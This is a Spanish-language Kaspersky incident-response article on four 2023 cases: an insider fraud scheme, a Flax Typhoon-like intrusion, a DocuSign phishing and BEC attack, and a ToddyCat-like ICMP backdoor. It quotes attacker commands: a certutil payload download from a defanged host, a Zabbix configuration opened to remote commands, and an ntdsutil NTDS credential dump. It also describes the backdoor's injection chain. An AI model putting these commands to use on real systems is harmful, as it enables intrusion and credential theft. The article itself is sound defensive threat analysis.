En 2023, el Equipo Global de Respuesta ante Emergencias (GERT) de Kaspersky participó en servicios en todo el mundo, lo que permitió a nuestros expertos obtener información sobre diversas amenazas y técnicas utilizadas por grupos APT, crimeware común y, en algunos casos, adversarios internos. Como destacamos en nuestro informe anual, la amenaza más prominente en 2023 fue el ransomware, y la vertical de gobierno fue el sector que más frecuentemente solicitó servicios de análisis forense digital, respuesta a incidentes y análisis de malware (DFIRMA). Aunque el cifrado de archivos fue la amenaza más común el año pasado, este artículo analiza en profundidad casos específicos que llamaron nuestra atención y que se mencionaron durante nuestro seminario web sobre el informe anual DFIRMA.
El ataque de fraude interno
Un grupo de colaboradores de una organización gubernamental identificó un servicio interno que permitía la creación de transacciones legítimas que no eran transferencias directas de dinero, pero que podían dar lugar a pérdidas monetarias para la organización. Estas pérdidas podían alcanzar millones de dólares.
El siguiente escenario (no relacionado con un cliente específico) podría considerarse un ejemplo de dicho uso indebido de un servicio interno:
Un banco sólo permite a un cliente abrir un máximo de dos cuentas bancarias de forma gratuita, pagando el cliente una comisión para abrir cuentas adicionales. Sin embargo, el adversario utilizó el sistema interno para crear múltiples cuentas bancarias para clientes individuales, que evitaron pagar las tasas requeridas a cambio de un pago al adversario. Como resultado de este incidente, la organización declaró una pérdida de más de 20 millones de dólares.
Se solicitaron para su análisis numerosos registros relacionados con la aplicación en cuestión, así como accesos VPN y actividad en la red, y se identificó a los empleados implicados en la actividad fraudulenta. Se analizaron dos casos diferentes en los que se confirmó el abuso de la configuración de transacciones: uno mediante la explotación de una vulnerabilidad en una interfaz de depuración y el otro mediante el uso indebido de privilegios en una cuenta válida.
En el primer caso, GERT identificó una configuración errónea de la que abusaron los adversarios para robar cookies de otros usuarios con el fin de suplantar su identidad y su actividad. Una aplicación en uno de los sistemas analizados recolectó detalles de registro de excepciones que incluían cookies del usuario que se encontró con la excepción, lo que nos permitió determinar el usuario implicado.
En el otro caso, uno de los usuarios modificó los privilegios y detalles de otro usuario, haciéndose pasar por él para crear transacciones adicionales en el servicio interno e intentando ocultar los detalles originales. Posteriormente, este usuario recién modificado accedió a la VPN desde un sistema previamente conocido en el que otro usuario accedía al sistema de transacciones, por lo que inicialmente se catalogó como actividad legítima, pero que recientemente se confirmó que formaba parte de la actividad maliciosa.
La mayor parte de la actividad delictiva se realizaba accediendo a la infraestructura a través de la VPN, pero se descubrió que un nuevo usuario accedía al sistema de transacciones desde la red interna utilizando el mismo comportamiento no autorizado.
Los resultados del análisis del equipo del GERT confirmaron la connivencia de un usuario implicado en las solicitudes de transacciones y consiguieron identificar las fuentes y vincular la actividad del usuario a varios sistemas implicados en la investigación, incluidos los ID locales y remotos. Esta información fue utilizada oportunamente por el cliente para emprender acciones legales contra el empleado infiltrado y sus cómplices.
Mitre ATT&CK – Técnica
| Táctica | Técnica usada | ID de la técnica | Detalles |
| Initial Access Persistence |
Valid Accounts | T1078 | Los adversaries usaron credenciales legitimas para acceder a la VPN y a servicios internos. |
| Initial Access | External Remote Services | T1133 | Los adversarios usaron el servicio VPN del cliente para tener acceso a los servicios internos. |
| Credential Access | Steal Web Session Cookie | T1539 | Los adversarios abusaron de fallas de configuración en el servicio transaccional para robar las cookies de otros usuarios. |
| Impact | Data Manipulation | T1565 | Tras hacerse pasar por otros usuarios con privilegios para crear transacciones, el adversario comenzó a crear transacciones no autorizadas en su nombre. |
Ataque APT Flax Typhoon/SLIME13
Tras activar Kaspersky Managed Detection and Response (MDR) en la infraestructura de un cliente, nuestras plataformas detectaron la presencia de software muy conocido instalado en las instalaciones del cliente sin su conocimiento.
Aunque estas aplicaciones eran legítimas, los atacantes las utilizaban para obtener acceso persistente al entorno de la víctima.
En septiembre de 2023, Kaspersky MDR detectó un servicio sospechoso en un host corporativo. Los adversarios utilizaron una técnica que imitaba el nombre real de la aplicación del sistema conhost.exe, pero el servicio se iniciaba desde una carpeta no estándar. El análisis de GERT confirmó que la aplicación no era un servicio del sistema, sino que estaba asociada a SoftEther VPN: un software VPN multiprotocolo legítimo.
La supuesta aplicación conhost fue descargada al sistema por un usuario local legítimo utilizando el conocido LOLBin certutil de Windows, y luego instalada a través de la línea de comandos como un servicio del sistema:
|
1 |
certutil.exe -urlcache -split -f hxxp://<Public IP>/conhost.exe |
En otro host se observó otro servicio sospechoso enmascarado como wshelper.dll. Esta DLL estaba asociada al agente Zabbix, que normalmente se despliega con el objetivo de monitorización para supervisar activamente los recursos y aplicaciones locales.
El análisis de la muestra confirmó que el archivo de configuración estaba manipulado para permitir comandos remotos, aprovechando las comprobaciones pasivas y activas habilitadas por:
|
1 2 3 4 |
Zabbix.EnableRemoteCommands=1 LogFile=0 Server=0.0.0.0/0 ListenPort=5432 |
El puerto 5432 se configuró en una regla de cortafuegos para permitir la escucha, con el “creativo” nombre PGSQL, a fin de que pareciera legítimo.
El análisis de GERT confirmó que la intrusión duró más de dos años. En las primeras fases del ataque, se creó un volcado NTDS utilizando comandos del sistema:
|
1 2 |
cmd /c ntdsutil "ac i ntds" ifm "create full c:\PerfLogs\test" q q c:\windows\sysvol\domain\ntds\active directory\ntds.dit" |
Durante esos dos años de intrusión, los controles de seguridad detectaron y contuvieron múltiples intentos de ejecutar aplicaciones de pentesting como Mimikatz y CobaltStrike, pero todo el software legítimo reutilizado permaneció invisible hasta que el cliente decidió implantar nuestra solución MDR. El análisis GERT confirmó que la infraestructura había estado comprometida desde mediados de 2021. Los artefactos y las TTP de los atacantes son similares a los utilizados por el grupo Flax Typhoon APT, que emplea un mínimo de malware y cargas útiles personalizadas, pero en cambio se basa en gran medida en aplicaciones legítimas.
Mitre ATT&CK – Técnicas
| Táctica | Técnica usada | ID de la técnica |
| Initial Access | Exploit Public-Facing Application | T1190 |
| Resource Development | Develop Capabilities: Malware | T1587.001 |
| Credential Access | OS Credential Dumping: LSASS Memory | T1003.001 |
| Credential Access | OS Credential Dumping: Security Account Manager | T1003.002 |
| Command And Control | Protocol Tunneling | T1572 |
| Command And Control | Ingress Tool Transfer | T1105 |
| Credential Access | Brute Force: Password Spraying | T1110.003 |
| Execution | Exploitation for Client Execution | T1203 |
| Lateral Movement | Remote Services: Remote Desktop Protocol | T1021.001 |
| Lateral Movement | Remote Services: SMB/Windows Admin Shares | T1021.002 |
| Defense Evasion | Masquerading: Match Legitimate Name or Location | T1036 .005 |
La falta de control MFA
Tras habilitar la autenticación multifactor (MFA) para sus “empleados críticos”, una empresa financiera fue blanco de un ataque de spear-phishing.
El ataque de phishing imitaba la popular plataforma DocuSign y estaba dirigido a un grupo específico de empleados. Aunque la empresa detectó el ataque de phishing y configuró reglas para evitar la recepción de correos electrónicos similares, algunos usuarios recibieron y abrieron el correo electrónico malicioso.
Entre los que abrieron el enlace sin darse cuenta, se encontraba uno de los usuarios críticos asociados a procesos de compras y adquisiciones. Los atacantes pudieron capturar el control de su cuenta gracias a la implementación de un kit de phishing configurado para robar automáticamente los tokens MFA.
El ataque inicial de phishing se produjo el 6 de octubre de 2023, y los analistas de GERT confirmaron que uno de los usuarios objetivo abrió el correo electrónico malicioso ese mismo día, al que siguieron nuevas conexiones desde diferentes ubicaciones fuera de la sede de la empresa. Los atacantes también configuraron dispositivos MFA adicionales para acceder al contenido del buzón del usuario objetivo sin ser advertidos y sin manipular el buzón original.
Los atacantes accedieron al contenido del buzón durante varios días, lo que les permitió comprender los procesos internos y preparar un ataque BEC.
Un mes después del acceso inicial, los atacantes comprometieron una cuenta de correo electrónico privilegiada (en la que no estaba habilitada la MFA). Esta nueva cuenta tenía privilegios en Microsoft 365, lo que permitió configurar nuevas reglas y parámetros. Los atacantes configuraron privilegios de “enviar como” en nombre de usuarios críticos, como aprobadores y solicitantes de transferencias de dinero. Los adversarios también utilizaron esta cuenta para configurar reglas de reenvío para ocultar los mensajes recibidos de un banco específico y de usuarios específicos.
Una vez configurados los privilegios y reglas necesarios, los atacantes enviaron una nueva solicitud por correo electrónico utilizando una plantilla legítima, utilizada previamente en la empresa para solicitar transferencias de dinero, y adjuntaron documentos recogidos de la cuenta comprometida original, pero con una cuenta bancaria de destino diferente, solicitando una transferencia internacional de más de 300.000 dólares.
Al recibir la solicitud, el banco procesó la transferencia como de costumbre basándose en la fuente legítima y los documentos adjuntos.
Se envió una notificación al cliente desde una dirección de correo electrónico perteneciente al banco, confirmando la transferencia. Sin embargo, esta dirección de correo electrónico no figuraba en las reglas de reenvío de los atacantes, por lo que el mensaje llegó al buzón del cliente. Tras recibir este mensaje, el cliente decidió investigar al usuario responsable de la cuenta de correo privilegiada.
El análisis de GERT confirmó la fecha y el vector inicial del ataque, los usuarios comprometidos y todas las técnicas utilizadas por los actores de la amenaza, y proporcionó un conjunto de recomendaciones para proteger y supervisar los activos en la nube. Mediante el análisis de los registros de acceso de los usuarios (UAL) y de otros registros de la nube, así como de los registros del cortafuegos y de los propios registros del sistema del cliente, GERT pudo proporcionar una cronología completa en la que se detallaban todas las técnicas utilizadas por los estafadores.
Mitre ATT&CK – Técnicas
| Táctica | Técnica usada | ID de la técnica | Detalles |
| Initial Access | Phishing: Spear phishing Link | T1566.002 | Ataque dirigido contra el dominio del cliente desde octubre 6, 2023 |
| Persistence | Account Manipulation: Device Registration | T1098.005 | Múltiples métodos de autenticación habilitados para un usuario comprometido. |
| Credential Access | Brute Force: Password Guessing | T1110.001 | Acceso fallido en nombre de múltiples usuarios. |
| Credential Access | Brute Force: Password Spraying | T1110.003 | Pruebas de intento de acceso con credenciales confirmadas como robadas por Malware Stealers |
| Privilege Escalation | Account Manipulation: Additional Email Delegate Permissions | T1098.002 | Nuevo permiso configurado para evitar la detección y acceder a diferentes buzones de correo |
| Persistence | Email Collection: Email Forwarding Rule | T1114.003 | Nuevas reglas configuradas para eludir la detección y permanecer persistentes |
Ataque APT tipo ToddyCat con una puerta trasera ICMP
El servicio Managed and Detection Response (MDR) de Kaspersky fue alertado de actividad sospechosa en controladores de dominio y servidores Exchange.
Se contactó con GERT para investigar el caso; nuestro análisis confirmó el abuso de SMB y la explotación del servicio IKEEXT, así como la explotación de la vulnerabilidad de ejecución remota de código del servidor Microsoft Exchange (CVE-2021-26855).
Un hallazgo interesante fue el uso de IKEEXT para la persistencia. La vulnerabilidad utilizada por los atacantes, junto con el exploit para la misma, fue publicada por primera vez por High-Tech Bridge Security Research Lab en 2012. Estaba asociada a la biblioteca wlbsctrl.dll y se utilizaba originalmente para la escalada de privilegios. Poco después de la publicación del exploit, Microsoft parcheó la vulnerabilidad. Sin embargo, nuestros analistas confirmaron que la misma biblioteca se utiliza ahora como mecanismo de persistencia para el malware.
IKEEXT es un servicio predeterminado en Windows. Es invocado por el proceso svchost, que carga ikeext.dll, la DLL responsable del servicio IKEEXT.
La librería ikeext.dll, a su vez, es responsable de cargar una DLL llamada wlbsctrl.dll, que es el comportamiento predeterminado de Windows. Sin embargo, mientras que el servicio svchost siempre se ejecuta en el sistema, wlbsctrl.dll no existe en el sistema de archivos por defecto, y aquí es donde los actores de amenazas vieron una oportunidad.
Los actores de la amenaza crearon una versión maliciosa de wlbsctrl.dll y la guardaron en el sistema. Basándose en el comportamiento de Windows, esta DLL se ejecutaba cada vez sin requerir registro en Autorun, como habitualmente lo ejecutan algunas familias de malware para la persistencia.
Además de la persistencia, en el incidente investigado el actor de la amenaza utilizó la vulnerabilidad IKEEXT para realizar un movimiento lateral a través del protocolo SMB y creó una regla de cortafuegos personalizada denominada “DLL Surrogate” que permite a dllhost.exe escuchar en el puerto personalizado 52415. Todo esto se logró mediante la colocación de la wlbsctrl.dll backdoored en la carpeta system32 donde la biblioteca legítima se almacena normalmente (si está presente en el sistema).
Más tarde, el atacante implementó una puerta trasera ICMP. Una vez identificado el backdoor, Kaspersky verificó y detectó otras dos muestras circulando en Internet fuera de la infraestructura del cliente. Todas las muestras descubiertas eran similares excepto en los siguientes puntos:
- Algunas diferencias en la cabecera PE (comportamiento normal entre muestras similares).
- Diferentes cadenas mutex, todas ubicadas en el mismo offset del archivo.
- Diferentes bytes en el offset del archivo 0x452-0x483, que aparentemente son código inútil (no accionable).
Según el análisis de GERT, el backdoor actuaba como un cargador, configurado para ejecutar las siguientes actividades:
- Comprueba el mutex; si ya existe en memoria, termina el proceso.
- Intentar leer el archivo %WINDIR%\Microsoft.NET\Framework\sbs_clrhost.res; descifra su contenido usando el algoritmo AES con una CLAVE codificada y una CLAVE derivada del número de serie del volumen (VSN) de la unidad C, luego la usa para establecer el valor de la clave del registro “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, y luego borrar el archivo.
- Carga el contenido del valor predeterminado de la clave de registro “SOFTWARE\Classes\Interface {<calculated_for_each_host>}”, lo descifra de nuevo con AES utilizando la misma CLAVE descrita anteriormente, e invoca el shellcode de carga útil.
- Asigna el tamaño del shellcode en un nuevo segmento y salta a él.
Nota: El NOMBRE REGKEY calculado (Interfaz {<calculated_for_each_host>}) se basa en el VSN de la unidad C (sin el VSN del host no es posible descifrar correctamente).
Como parte del análisis, GERT identificó una carga útil almacenada en el registro de Windows y la analizó, confirmando el siguiente comportamiento en la carga útil cifrada.
La carga útil descifrada tiene el encabezado “CAFEBABE” (bytes hexadecimales mágicos relacionados con archivos Java Class) seguido del tamaño del shellcode y finalmente los datos. Esta carga útil ejecuta los siguientes comandos:
- Se desencripta (por tercera vez).
- Si no se ejecuta bajo dllhost.exe, crea un proceso dllhost suspendido con el parámetro “/Processid: {02D4B3F1-FD88-11D1-960D-00805FC79235}”, que hace referencia a un servicio de aplicación del sistema COM+.
- Asigna espacio al nuevo proceso.
- Escribe una sección de la carga útil descifrada en la nueva asignación (comenzando en el offset 0x1A03, y con un tamaño contenido en un pequeño encabezado en el offset 0x19FF).
- Parcha dllhost (sólo en memoria) para asegurar la ejecución en el nuevo espacio asignado.
- Reanuda el proceso dllhost.
Una nueva instancia del shellcode comienza desde el paso uno. Identifica que en realidad se está ejecutando bajo dllhost, descifra una nueva sección, la ejecuta y escucha en el puerto 52415. La carga útil final inyectada en dllhost.exe parece crear un socket ICMP sin procesar y sin puerto. No se realiza ninguna conexión saliente (aunque es probable que la carga útil recibida se comunique de forma saliente). Los datos se reciben de una fuente desconocida en un paquete ICMP codificado en Base64, se convierten a binario, se descifran y se ejecutan mediante la ejecución directa de datos (asignando espacio utilizando la función VirtualAlloc), copiando la shellcode al espacio asignado y realizando una llamada directa al espacio asignado.
Según nuestras plataformas de inteligencia de amenazas, esta amenaza tiene similitudes con ataques APT: las Tácticas, Técnicas y Procedimientos (TTP) de ataque utilizadas son muy similares a las del actor ToddyCat, pero no hay una atribución sólida a este grupo para este incidente.
El objetivo del actor de amenaza era conseguir persistencia para su seguimiento y futuro impacto, pero no se confirmaron otros objetivos a partir de las pruebas obtenidas.
Mitre ATT&CK – Técnicas
| Táctica | Técnica usada | ID de la técnica |
| Resource Development | Develop Capabilities: Exploits | T1587.004 |
| Resource Development | Develop Capabilities: Malware | T1587.001 |
| Initial Access | Valid Accounts: Domain Accounts | T1078.002 |
| Initial Access | Valid Accounts: Local Accounts | T1078.003 |
| Execution | System Services: Service Execution | T1569.002 |
| Execution | User Execution: Malicious File | T1204.002 |
| Persistence | Create or Modify System Process: Windows Service | T1543.003 |
| Persistence | Hijack Execution Flow: DLL Side-Loading | T1574.002 |
| Persistence | Server Software Component: Web Shell | T1505.003 |
| Persistence | Valid Accounts: Domain Accounts | T1078.002 |
| Defense Evasion | Abuse Elevation Control Mechanism: Bypass User Account Control | T1548.002 |
| Defense Evasion | Direct Volume Access | T1006 |
| Defense Evasion | Modify Registry | T1112 |
| Defense Evasion | Impair Defenses: Disable or Modify System Firewall | T1562.004 |
| Defense Evasion | Impair Defenses: Disable Windows Event Logging | T1562.002 |
| Defense Evasion | Indicator Removal: Clear Windows Event Logs | T1070.001 |
| Defense Evasion | Indicator Removal: File Deletion | T1070.004 |
| Defense Evasion | Impair Defenses: Impair Command History Logging | T1562.003 |
| Command And Control | Non-Application Layer Protocol | T1095 |
Conclusiones
Aunque las estadísticas muestran que el sector gubernamental fue la vertical más atacada el año pasado, está claro que a los actores de amenazas y crimeware no les importa a qué vertical pertenecen sus objetivos potenciales. Para que usted esté siempre por delante de los atacantes, lo mejor es evaluar su inventario de activos y seguir supervisándolo y protegiéndolo.
La tendencia de los ciberataques e intrusiones que hacen uso de activos de infraestructura o aplicaciones legítimas en las instalaciones crea la necesidad de habilitar capas adicionales de supervisión basadas en inteligencia sobre amenazas. La implementación de MDR ha sido uno de los desencadenantes recurrentes de nuevas investigaciones gracias a sus capacidades de detección y a la habilidad de los analistas para determinar cursos de acción oportunos.
Para obtener más información sobre nuestro informe de respuesta a incidentes, le invitamos a ver la grabación del seminario web “Analyzing last year’s cyber incident cases”.
Un análisis profundo a los casos de respuesta a incidentes más interesantes del último año